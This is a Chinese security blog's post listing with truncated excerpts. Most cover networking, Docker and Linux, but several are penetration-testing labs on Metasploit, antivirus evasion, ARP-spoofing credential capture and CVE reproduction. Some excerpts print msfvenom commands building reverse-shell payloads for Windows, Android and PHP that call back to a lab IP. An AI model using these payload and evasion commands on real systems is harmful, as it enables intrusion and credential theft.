自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(47)
  • 资源 (18)
  • 论坛 (2)

原创 CTF之命令执行
原力计划

练习环境    攻击机:kali    靶机:Ubuntu 17.041.发现靶机,进行端口扫描root@afei:~# ifconfig eth0eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.3.150 netmask 255.255.255.0 bro...

2020-03-29 19:14:01 312

原创 MSF渗透框架简介及使用
原力计划

Metasploit简介    Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。    Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D.Moore在2003年发...

2020-03-23 21:53:09 118

原创 带你玩转docker:Docker数据管理与端口映射
原力计划

Docker数据管理    生产环境中使用Docker的过程中,往往需要对数据进行持久化,或者需要在多个容器之间进行数据共享,这必然涉及容器的数据管理操作。容器中管理数据主要有两种方式:数据卷(Data Volumes):容器内数据直接映射到本地主机环境;数据卷容器(Data Volume Containers):使用特定容器维护数据卷。一、数据卷数据卷是一个可供容器使用的特殊目录,它...

2020-03-11 21:05:54 264

原创 带你玩转docker:Docker容器概述

容器技术的发展 在过去十年里,围绕计算、存储、网络三大基础服务,围绕敏捷服务和规模处理两大核心诉求,新的概念、模式和工具争相涌现。这些创新的开源技术成果,提高了整个信息产业的生产效率,降低了应用信息技术的门槛让“互联网+”成为可能。 如果说软件定义网络(SDN)和网络功能虚拟化(NFV)让互联网络的虚拟化进入了崭新的阶段,那么容器技术的出现,毫无疑问称得上计算...

2020-03-11 14:44:32 2747

原创 大 数 据 应 用 职 业 技 能 大 赛 题 库

大 数 据 应 用 职 业 技 能 大 赛 题 库一 、 单 选 题1 . H D F S 中 的 b l o c k 块 默 认 保 存 ( ) 份A . 1B . 2C . 3D . 42 . 下 列 程 序 中 负 责 H D F S 数 据 存 储...

2020-03-01 19:13:07 348

原创 部署hadoop+hive+sqoop

实验环境 主机名 主机IP 角色 操作系统 hadoop1 192.168.1.40 NameNode CentOS 7.4 hadoop2 192.168.1.41 ...

2020-03-01 12:28:46 482

原创 CTF之PUT上传(SickOS 1.2)
原力计划

中间件PUT漏洞介绍    中间件包括apache、tomcat、IIS、weblogic等,这些中间件可以设置支持的HTTP方法。(HTTP方法包括GET、POST、HEAD、 DELETE、 PUT、 OPTIONS等)每一个HTTP方法都有其对应的功能,在这些方法中,PUT可以直接从客户机上传文件到服务器。如果中间件开放了HTTP中的PUT方法,那么恶意攻击者就可以直接上传webshel...

2020-03-31 21:14:18 142

原创 kali linux常见问题汇总
原力计划

问题1:kali开机无法进入图形化界面原因:apt-update更新报错导致root@kali:~# apt-get updateHit:1 http://mirrors.aliyun.com/kali kali-rolling InReleaseErr:1 http://mirrors.aliyun.com/kali kali-rolling InRelease...W: Faile...

2020-03-30 20:39:17 116

原创 命令执行(集成工具)
原力计划

命令执行漏洞介绍    当应用需要调用一-些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、 shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意系统命令到正常命令中,造成命令执行攻击。    调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,又没有过滤用户的输入的情况下,就会造成命令执行漏...

2020-03-30 11:58:55 87

原创 CTF之暴力*解(wordpress)
原力计划

暴力*解漏洞介绍暴力*解最常用的方法:穷举法    穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;若全部情况验证后都不符合题目的全部条件,则本题无解。穷举法也称为枚举法。Web安全中的暴力*解也是利用尝试所有的可能性最终获取正确的结果。练习环境攻击机:kali...

2020-03-29 10:51:22 194

原创 FTP后门渗透

FTP简单介绍 FTP是File Transfer Protocol (文件传输协议)的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序。FTP服务占用的端口:20、21练习环境攻击机:kali靶机:Ubuntu 16.04.31.发现靶机并扫描端口root@afei:~# ifconfig eth0eth0: f...

2020-03-28 19:27:40 131

原创 shellter免杀

Shellter简介 Shellter是一个动态的shellcode注入工具,是第一个真正动态的PE infector创建的。“动态”二字就能够说明注入代码不可能存在于规则严格的地方,例如可执行文件的入口点等。它可以用于将shellcode注入本机Windows应用程序(目前仅适用于32位应用程序)。 目前,Shellter已经被正式收录到Kali Li...

2020-03-28 13:31:36 102

原创 TheFatRat免杀

TheFatRat简介 TheFatRat是一个简单的生成后门工具,这个工具编译流行的恶意软件的有效载荷,然后可以执行编译的恶意软件在windows上、android、mac。使用此工具创建的恶意软件也有一个能力绕过大部分杀毒软件保护。 实验环境 攻击机:kali IP:192.168.3.150 靶机:windows7 x...

2020-03-28 12:52:46 305

原创 msfvenom常规编码器(encoder)免杀

实验环境 攻击机:kali IP:192.168.3.150靶机:windows7 x64 IP:192.168.3.1761. 编码器选项root@afei:~# msfvenom --list encoders #列出可用的编码器Framework Encoders [--encoder <value>]...

2020-03-27 17:08:44 284

原创 利用MS10-046漏洞攻击win7操作系统

MS10-046简介    MS10-046是一个文件快捷方式漏洞,能利用这个漏洞提权直接获取到shell。利用MS10-064攻击win7获取shell实验环境:攻击机:kali靶机:win7-x86_641.开启kali和win72.kali中启动MSF找到MS10-046模块root@kali:~# msfconsole #启动MSF ...

2020-03-27 14:44:13 632

原创 CEV-2018-0802 Microsoft Office漏洞复现

漏洞产生背景    在潜伏17年的“噩梦公式”漏洞(CVE-2017-11882)被曝光修补之后,之前的漏洞程序EQNEDT32.EXE在windows 10系统下仍然没有开启ASLR保护,因此其利用非常容易,在修补之后可以发现微软的发布的是二进制补丁而不是对该程序源码进行重新编译,因此猜测该程序的源码可能已经遗失,如果真实情况是这样,那么公式编辑器这个进程将成为其他漏洞发现和利用的“圣地”,因...

2020-03-26 10:13:39 125

原创 CVE-2018-8174漏洞复现

CVE-2018-8174简介    CVE-2018-8174是360 核心安全事业部高级威胁应对团队在全球范围内率先监控到的一例使用 0day 漏洞的 APT 攻击,捕获到了全球首例利用浏览器 0day 漏洞的新型 Office 文档攻击,并将该漏洞命名为“双杀”漏洞。该漏洞影响最新版本的 IE 浏览器及使用了 IE 内核的应用程序。用户在浏览网页或打开 Office 文档时都可能中招,最终...

2020-03-26 09:44:39 79

原创 msfvenom生成木马攻击windows

实验环境攻击机:kali     IP:192.168.43.5靶机:windows生成木马攻击windows1.在kali上生成反弹木马root@afei:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.5 lport=55555 -f exe > test.exe[-] No pla...

2020-03-25 20:38:09 201

原创 Ubuntu编译安装R环境—踩坑系列

Ubuntu18.04 apt安装R语言环境1.安装R语言环境root@server:~# echo "deb https://cloud.r-project.org/bin/linux/ubuntu bionic-cran35/" >> /etc/apt/sources.listroot@afei:~# apt-key adv --keyserver keyserver.ubu...

2020-03-24 15:39:11 88

原创 MS12-020远程桌面漏洞复现

MS12-020漏洞简介    MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞。RDP远程桌面协议简介    远程桌面协议(RDP,Remote Desktop Protocol)是一个多通道(multi-channel)的协议,用户可以通过客户端远程连接服务端。占用端口:3389标题漏洞影响范围    Microsoft Windows...

2020-03-24 11:45:00 114

原创 msf生成webshell攻击服务器

实验环境攻击机:kali   IP:192.168.3.157靶机:win 10(已搭建WAMP)生成Webshell攻击服务器1.在kali上生成Webshell Payloadroot@afei:~# msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.3.157 lport=5555 -f raw > shel...

2020-03-22 15:40:10 249

原创 kali postgresql简介及使用

PostgreSQL简介    PostgreSQL是一个功能强大的开源数据库系统。PostgreSQL已在可靠性、稳定性、数据一致性等获得了业内极高的声誉。目前PostgreSQL可以运行在所有主流操作系统上,包括Linux、Unix(AIX、BSD、HP-UX、SGI IRIX、Mac OS X、Solaris和Tru64)和Windows。PostgreSQL是完全的事务安全性数据库,完整...

2020-03-22 09:28:33 341

原创 msfvenom生成payload参数讲解

metasploit更新后去除了msfencode和msfpayload,并推出了全新的生成器:msfvenom msfvenom参数讲解 root@kali:~# msfvenom -hMsfVenom - a Metasploit standalone payload generator.Also a replacement for msfpayload...

2020-03-21 22:14:32 172

原创 msf生成木马攻击android手机

实验环境 攻击机:kali IP:192.168.43.5靶机:oppor9st 生成木马攻击android手机 1.在kali上生成反弹木马root@afei:~# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.5 lport=6666 R > hello.apk[...

2020-03-21 21:27:55 1187

原创 信息收集网络踩点之拓扑路径踩点

使用的命令 traceroute tcptraceroute traceroute traceroute是用来检测发出数据包的主机到目标主机之间所经过的网关数量的工具。traceroute的原理是试图以最小的TTL(存活时间)发出探测包来跟踪数据包到达目标主机所经过的网关,然后监听一个来自网关ICMP的应答。发送数据包的大小默认为38个字节。原理:程...

2020-03-21 11:21:13 64

原创 信息收集网络踩点之DNS-IP踩点

whois---域名注册信息查询 nslookup与dig---域名查询 IP2Location、netcraft和IP2Domain---实现地理位置查询、详细信息查询和反查域名 1. whois域名注册信息查询功能:用来查询域名注册信息库的工具(可以查询到域名服务器、域名创建时间、域名到期时间、域名持有人或注册商、邮箱、电话号码等)root@kali...

2020-03-18 20:20:27 142

原创 Telnet&FTP配置实验

1. Telnet远程登录实验 Telnet远程登录配置一般采用AAA认证登录方式。实验拓扑:实验目的: 在AR1上配置telnet远程登录,采用aaa认证,实现从AR2远程登录AR1。AR1配置:<Huawei>sysEnter system view, return user view with Ctrl+Z.[H...

2020-03-17 12:45:06 191

原创 CRT(Securecrt)连接ENSP设备

securecrt简介 SecureCRT是一款支持SSH(SSH1和SSH2)的终端仿真程序。它也支持Serial协议,能够连接路由器交换机。 CRT(securecrt)连接ENSP模拟器设备 查看设备端口:连接成功解决CRT 下 Tab键无法补全问题将这个勾...

2020-03-16 11:14:48 1072

原创 IP地址和MAC地址

1.MAC地址 MAC(Media Access Control,介质访问控制)地址,或称为物理地址,也叫硬件地址,用来定义网络设备的位置,MAC地址是网卡出厂时设定的,是固定的(但可以通过在设备管理器中或注册表等方式修改,同一网段内的MAC地址必须唯一)。MAC地址采用十六进制数表示,长度是6个字节(48位),分为前24位和后24位。(1)前24位叫做组织唯一标志符(Orga...

2020-03-16 10:37:17 47

原创 一文读懂——TCP&UDP原理

传输层定义了主机应用程序之间端到端的连通性。传输层中最为常见的两个协议分别是传输控制协议TCP(Transmission Control Protocol)和用户数据包协议UDP(User Datagram Protocal)。一、TCP协议 TCP位于TCP/IP模型的传输层,它是一种面向连接的端到端协议,可以为主机提供可靠的数据传输。1.TCP...

2020-03-15 20:07:36 99

原创 VLAN间的三层通信

多臂路由(已经淘汰) 基于物理接口的VLAN间路由。优点:既能隔离广播域又能实现通信。多臂路由的缺点: 每一个VLAN 都需要占用路由器上的一个物理接口(也就是说,每一个VLAN都需要路由器从一个物理接口伸出一只手臂来),如果VLAN数目众多,就需要占用大量的路由器接口。事实上,路由器的物理接口资源是非常宝贵而稀缺的,一台路由器上的物理接口数量通常都是非常...

2020-03-14 11:44:48 83

原创 VLAN基本原理及配置

1. VLAN简介 VLAN(Virtual LAN),翻译成中文是“虚拟局域网”。LAN可以是由少数几台家用计算机构成的网络,也可以是数以百计的计算机构成的企业网络。VLAN所指的LAN特指使用路由器分割的网络。2. VLAN的基本原理 VLAN的存在就是为了隔离广播域,通过在支持VLAN的交换机上添加VLAN,并且动态的调整每个端口所属VLAN(默认端...

2020-03-13 21:20:34 178

原创 敏感目录收集工具

敏感目录收集mysql管理接口后台目录上传目录phpinforobots.txt---->列出防爬行目录安装包安装页面---->index.php爬行Cracer渗透工具包6.0下载链接:https://pan.baidu.com/s/1ac-t-EMrl89aGJMm3pYS5w 密码:a8f11.御剑后台目录扫描    御剑是一款好用的网站后台扫描工具,图...

2020-03-12 20:53:09 190

原创 Linux CentOS系统问题排除

1.从windows上传一个文本到Centos上,打开后出现乱码问题。将上图txt文件上传到Linux[root@client1 ~]# rz[root@client1 ~]# lsab打开乱码.txt Downloads Pictures tomcatanaconda-ks.cfg hadoop Public ...

2020-03-10 16:51:54 411

原创 信息搜集之nmap扫描

NMAP简介 NMAP是一个综合性的,并且特性丰富的端口扫描工具,是一个渗透测试者的必备工具。Nmap的用途:Host discovery(主机发现) Service/version detection(服务于版本检测) Operating system detection(操作系统检测) Network traceroute(网络追踪) Nmap Script...

2020-03-10 09:55:08 318

原创 瑞士军刀netcat命令详解

Netcat命令介绍 netcat被称为网络工具中的“瑞士军刀”,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,可以在脚本中以多种方式使用它。netcat所做的就是在两台电脑之间建立链接并返回两个数据流。使用netcat命令所能完成的事情有很多。 netcat 简称 nc,为了弥补了nc 的不足,还有一个工具叫做ncat,被称为“21世纪的...

2020-03-09 17:00:34 224

原创 tcpdump抓包并进行SYN洪水攻击及防御

tcpdump抓包 [root@localhost ~]# yum -y install tcpdump #没有该工具先安装tcpdump参数解释:-A #以ASCII打印每个数据包;-b #以ASDOT表示法表示BGP数据包中的AS号;-B,--buffer-size #设置缓冲区大小,单位:Ki...

2020-03-09 13:12:52 383

原创 Ettercap进行ARP欺骗

实验环境攻击机:kali IP:192.168.3.144靶机:win 7 IP:192.168.3.141Ettercap进行ARP欺骗1.进入ettercap的图形化界面root@afei:~# ettercap -G #进入ettercap图形化界面2.选择网卡3.扫描局域网内的主机4.查看扫描出的主机5.选择目标主机,进行ARP欺骗...

2020-03-08 18:17:01 170

原创 Ettercap + arpspoof截取http账号密码

实验环境攻击机:   kali IP:192.168.3.144靶机:     win 7 IP:192.168.3.141Ettercap + arpspoof截取http账号密码1.使用arpspoof进行断网攻击,并开启端口转发root@afei:~# fping -gs -r 0 192.168.3.2/24 192.168.3.1 is alive19...

2020-03-08 17:57:54 222

原创 Ettercap中间人攻击截取FTP账号密码

中间人攻击理论    中间人攻击(Man in the Middle Attack,简称“MITM 攻击”)是一种间接的入侵攻击。通过各种技术手段,将入侵者控制的一台计算机,放置在网络连接中的两台通信计算机之间,这台计算机就称为“中间人”。常见攻击手段:   1、攻击者只要将网卡设为混杂模式,伪装成代理服务器监听特定的流量就可以实现攻击,这是因为很多通信协议都是以明文来进行传输的,如HTT...

2020-03-07 08:24:55 486

全国工业互联网安全大赛公益讲堂.pptx|全国工业互联网安全大赛公益讲堂.pptx

全国工业互联网大赛PPT,里面主要站在CTF赛事的视角,以互联网、工业互联网场景为题目环境,考核选手在常见的安全领域知识和技能掌握程度,包含WEB(网站安全)、PWN(破解)、REVERSE(逆向)、CRYPTO(密码学)、MISC(杂项)等五大类题目。考点涉及人工智能AI、区块链、5G、密码破解、渗透测试、工控设备漏洞、工控设备协议分析、云安全、溯源分析等多个领域应用。

2020-10-25

kali安装kde桌面并美化.docx|kali安装kde桌面并美化.docx

本文档教你如何定制的kali操作系统桌面,以及一些美化工具。是很简单也很常见的。kali Linux

2020-10-24

Flask入门.docx|Flask入门.pdf

该flask入门文档详细介绍了flask基础,从flask的安装、flask简单应用编写、route、变量规则、URL重定向和构建、已经Jinja2渲染模板等方面,通过代码实例实现

2020-10-16

配置WSL 2兼容Linux子系统.docx|配置WSL 2兼容Linux子系统.docx

本文档介绍了如何在Windows上使用wsl玩转Linux子系统。wsl常用命令解析和使用,以及wsl和wsl2在使用过程中的一些区别和问题。

2020-10-14

WSL配置docker.docx|WSL配置docker.docx

本文档详细介绍了WSL安装docker,步骤详细。以及详细介绍了WSL部署Docker所遇到的问题。

2020-10-13

win 10安装配置Kali子系统.docx|win 10安装配置Kali子系统.docx

本文档详细介绍了windows安装配置kali Linux子系统。安装xrdp、配置Xterm终端字体、安装kali桌面环境以及解决kali子系统碰到的一些问题。

2020-10-06

win 10安装配置Ubuntu子系统.docx|win 10安装配置Ubuntu子系统.docx

本文档介绍了win 10安装配置Ubuntu子系统。从换源、X-windows远程连接Ubuntu、安装配置桌面环境、安装mysql、配置ssh远程连接...等方面详细配置

2020-10-04

宝塔面板基本使用.docx|宝塔面板基本使用.docx

本文档详细介绍了宝塔面板的使用,并使用实例搭建了一个网站。让你搭建网站不再烦恼。适合网管和对网站搭建不熟悉的人学习,仅供参考。

2020-09-14

计算机网络基础.docx|计算机网络基础.docx

本文档详细介绍了计算机网络基础,从计算机网络的定义、介质、分类、网络分层(OSI、TCP/IP)等方面进行介绍讲解

2020-09-13

子网划分&VLSM&CIDR.docx|子网划分&VLSM&CIDR.docx

本文档详细介绍了网络基础中的子网划分、VLSM可变长子网掩码、CIDR无类别域间路由。并配上了了实例进行解释,让你子网划分不再烦恼。

2020-09-10

Nessus部署及使用.docx|Nessus部署及使用.docx

该文档详细记录了漏扫器Nessus的部署及使用,非常适合刚接触Nessus的安全测试人员学习。多谢大家支持哦。

2020-09-10

wmic命令行介绍及使用.pdf|wmic命令行介绍及使用.pdf

该文档详细记录了Windows Management InstrumentationCommand Line(Windows管理工具命令行)的基本使用,这对渗透测试进内网进行横向移动有很大帮助。

2020-09-07

Centos7.x搭建Snort IDS入侵检测环境.pdf|Centos7.x搭建Snort IDS入侵检测环境.pdf

本文详细记录了Centos7.x搭建Snort IDS入侵检测环境,以及在这过程中碰到的问题。使用到的软件包有:snort-2.9.15.1-1.centos7.x86_64.rpm、Pulledpork、 snortrules-snapshot-29151.tar.gz、Barnyard2、Adodb、Base

2020-09-02

win10上使用Wampserv(PHPstudy)搭建DVWA靶场环境.docx|win10上使用Wampserv(PHPstudy)搭建DVWA靶场环境.docx

详细记录了在Windows上使用WAMP或者PHPstudy搭建DVWA靶场环境,以及搭建过程中碰到的问题和解决办法。

2020-08-31

VMware虚拟机安装kali详细版.docx|VMware虚拟机安装kali详细版.docx

详细记录了VMware安装kali操作系统记录,从设置cpu、内存、磁盘大小和kali系统分区。适合小白学习。

2020-08-31

phpmyadmin上传Webshell总结.docx|phpmyadmin上传Webshell总结.docx

这里详细总结了phpmyadmin上传Webshell的方法,和利用条件,欢迎大家下载。有什么问题可以私聊我,一起探讨。

2020-08-31

隐写术总结.docx|隐写术总结.docx

这篇隐写术总结中载体隐写术做了详细的学习记录,对png、jpg、jpeg、gif等常见图片格式做了详细的学习研究。对隐写术工具:StegSolve、binwalk、 Steghide做了详细介绍和实例使用。

2020-08-27

Linux系统加固.pdf|Linux系统加固.pdf

从系统密码策略、管理系统账号和用户、设置系统的umask值,等等方面加固Linux系统安全,并且基于shell脚本实现。

2020-08-23

给CSDN的建议

发表于 2020-03-29 最后回复 2020-04-01

收益中心怎么提现

发表于 2020-01-01 最后回复 2020-01-01

空空如也
提示
确定要删除当前文章?
取消 删除